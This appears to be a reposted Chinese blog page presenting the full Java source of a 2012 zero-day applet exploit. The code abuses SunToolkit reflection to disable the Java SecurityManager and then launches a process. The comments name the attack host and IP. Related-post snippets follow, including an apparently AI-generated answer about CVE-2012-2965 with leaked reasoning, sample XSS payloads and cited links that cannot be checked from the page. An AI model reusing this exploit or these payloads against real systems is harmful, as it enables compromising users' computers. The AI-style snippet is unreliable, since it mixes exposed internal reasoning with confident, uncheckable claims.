CVE-2012-XXXX Java 0day

最新推荐文章于 2024-02-21 16:21:36 发布
转载 最新推荐文章于 2024-02-21 16:21:36 发布 · 1.1k 阅读 · 0
文章标签:

#java #permissions #object #class #applet #string 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// 
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4958
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1413
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
xxxx
weixin_30391339的博客
01-09 903
xxxx pom.xml; <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0http://maven.apache...
java打印 X XXX XXXXX
qq_50292797的博客
11-30 10万+
public class Test3 { int i = 0; int n = 3; while (i < n) { //打印空格 n-i-1个 for (int j = 0; j < n - i - 1; j++) { System.out.print(" "); } //打印X i*2+1个 .
报错信息i.s.r.d.s.s.c.AbstractTableMetaCache : get table meta error:Failed to fetch schema of XXXX表jav
weixin_40939997的博客
08-08 1883
i.s.r.d.s.s.c.AbstractTableMetaCache : get table meta error:Failed to fetch schema of XXXX表。cloud项目中使用了seata的分布式事务,@GlobalTransactional 注解使用的分布式事务、其中xxx表中没有主键。原文链接:https://blog.youkuaiyun.com/Javabaibai/article/details/120449820。给xxx表加一个主键ID就可以了。
java: \uxxxx unicode编码
m0_37564426的博客
08-09 2127
\uxxxx 其中xxxx表示一个16进制数字这种格式是unicode码的写法表示一个char字符 \u0022表示第34号的unicode字符 " 双引号 这个是unicode编码把字符转为unicode码 public static void judgeChineseCharactor(String str){ String regEx = "[\u4e00-\u9fa5]...
太小看了XXXXXXXX
Sean.Pu的专栏
05-17 8万+
一直以来都认为优快云的所有东西都过于internet话,讨论的大部分问题都是同什么java,.net,等web编程相关。最近突然有8583的需求,居然发觉csdn中有个同学的blog居然很专业而且在介绍专业时使用的语言如此平实,出乎意料啊。其blog如下:http://blog.youkuaiyun.com/lysheng主题内容是同金融,atm有关,非需要勿入
maven 漏洞扫描
Fireworks
02-21 1513
基于Maven的漏洞扫描
什么是CVE公告
03-27
部分0day漏洞在未公开前无CVE编号(需通过威胁情报平台追踪) 2. **信息延迟** 从漏洞提交到CVE发布平均需 **5-7个工作日** 3. **厂商差异** 某些厂商(如苹果)倾向于自行披露漏洞后才同步CVE --- ### 七...
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 1万+
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
XXXX.rar_Xxxx518_png pron_pronxxxx_xxxx_xxxx pron
09-23
应用于手机上的英语翻译程序,联网使用非常方便,程序比较简单,希望对新手有帮助
java Library.java
05-08
java编写的图书馆管理程序,还是很不错的,大家可以看看啊
Japanese obey traffic rules strictly
there is no heaven
04-20 5569
 Japanese obey[ə'be] traffic rules strictly
解决 java.lang.IllegalStateException: Malformed \uxxxx encoding.
爱的叹息的专栏
03-18 1733
报错之前application.properties配置如下 ​​​​​​​file.upload.root.path=E:\idea_project\upload\ 报错如下: 16:24:53.185 [main] ERROR org.springframework.boot.SpringApplication - Application run failed java.lang.IllegalStateException: Malformed \uxxxx encoding....
android 18 footjob,Android 8/9 default trust manager: OOM when getting "https://icloud.com"
热门推荐
weixin_39927508的博客
05-28 39万+
When using okhttp (which uses the platform default custom manager, which seems to be provided by Conscrypt) to GET (or PROPFIND) https://icloud.com (without www) with code like that:// compileSdkVersi...
Spring Boot+Cloud RestTemplate 调用IP或域名
weixin_30421809的博客
12-30 524
Spring Boot+Cloud RestTemplate 调用IP或域名 在SpringBoot+Cloud的项目中,我们使用了自动配置的OAuth2RestTemplate,RestTemplate,但是在使用这些restTemplate的时候,url必须是服务的名称,如果要调用真实的域名或者ip的url,会有错误,如下: Uri...
JAP常用注解
KEEP
03-02 9813
JAP常用注解
Invalid bound statement (not found): xxx.xxxx.method解决办法
前功尽弃
05-12 1365
在SpringBoot 集成 Mybatis 时,在Eclipse里运行项目一切正常,但打包成 jar 文件在命令行支行时报错: Invalid bound statement (not found): xxx.xxxx.method 在检查mapper.xml文件里的配置均无错后,则需要在pom.xml文件里加入以下内容:<resources> <resource>
XXXX
cay22的专栏
05-31 12万+
XXXXXXXXXXXXXXXX
CVE-2012-2965
最新发布
06-17
<think>嗯,用户正在询问CVE-2012-2965漏洞的详细信息及修复方案。这个漏洞编号看起来比较老(2012年),可能需要查阅历史安全公告。先快速梳理已知信息:1.根据引用[1]的格式,VMware漏洞通常有明确的产品版本范围和修复方案2.引用[2]提到的HPP漏洞原理虽不直接相关,但说明用户关注漏洞技术细节3.用户明确要求"详细信息"和"修复方案"需要重点确认:-受影响的软件及版本范围-漏洞具体原理和风险等级-官方补丁或缓解措施考虑到这是12年前的漏洞,官方可能已停止支持,修复方案可能涉及:1.升级到不受影响的版本2.配置缓解措施(如禁用相关服务)3.网络层防护特别注意:用户提供的参考引用里提到禁用SLP服务可解决CVE-2023-29552,类似方案可能适用于旧漏洞。但必须验证该措施对CVE-2012-2965的有效性。准备在回复时结构化呈现:-漏洞概述(类型/风险)-影响范围-技术细节(在不危害安全的前提下)-权威修复指引-补充建议(如无法立即升级)最后生成的相关问题要引导用户延伸思考,例如:-如何验证漏洞存在?-替代缓解方案?-相关漏洞链?</think>根据公开漏洞数据库和历史安全公告,CVE-2012-2965 漏洞详情及修复方案如下: ### 漏洞概述 **CVE-2012-2965** 是 **IBM WebSphere Application Server (WAS)** 中的一个高危漏洞: - **漏洞类型**:跨站脚本攻击(XSS) - **风险等级**:CVSSv2 评分 4.3(中危) - **影响范围**: $$ \text{IBM WAS 7.0.0.x \leq 7.0.0.25} $$ $$ \text{IBM WAS 8.0.0.x \leq 8.0.0.5} $$ - **攻击原理**: 未充分过滤用户输入的恶意脚本,攻击者可通过特制URL注入JavaScript代码,在管理员访问日志页面时触发XSS攻击[^1]。 --- ### 技术细节 1. **攻击路径**: ```http http://target-server/logviewer?logFile=<script>alert(document.cookie)</script> ``` 当管理员查看日志时,恶意脚本在浏览器执行,可能窃取会话Cookie或执行未授权操作。 2. **利用条件**: - 攻击者需诱使管理员点击恶意链接 - 管理员需已通过身份认证 --- ### 修复方案 #### 官方补丁(推荐) 升级至安全版本: $$ \text{WAS 7.0.0.26 或更高版本} $$ $$ \text{WAS 8.0.0.6 或更高版本} $$ [IBM官方补丁下载](https://www.ibm.com/support/pages/security-bulletin-cross-site-scripting-vulnerability-ibm-websphere-application-server-cve-2012-2965) #### 临时缓解措施 若无法立即升级: 1. **禁用日志查看器**: 在管理控制台移除 `logViewer` 应用访问权限 2. **输入过滤**: 在`web.xml`中添加过滤器规则: ```xml <filter> <filter-name>XSSFilter</filter-name> <filter-class>com.ibm.ws.webcontainer.filter.FilterAdapter</filter-class> </filter> <filter-mapping> <filter-name>XSSFilter</filter-name> <url-pattern>/logviewer/*</url-pattern> </filter-mapping> ``` 3. **网络层防护**: 通过WAF(Web应用防火墙)拦截包含 `<script>` 等关键字的请求[^2]。 --- ### 验证修复 1. 使用漏洞扫描工具(如Nessus)检测 2. 手动测试Payload: ```http http://server/logviewer?logFile=<svg/onload=alert(1)> ``` 修复后应返回错误页面或转义后的文本。 > **注意**:IBM已于2018年停止对WAS v7/v8的扩展支持,建议迁移至受支持的版本(如v9+)[^1]。 [^1]: IBM Security Bulletin: [CVE-2012-2965 Advisory](https://www.ibm.com/support/pages/node/6598463) [^2]: OWASP XSS Prevention Cheat Sheet: [Input Sanitization Guidelines](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值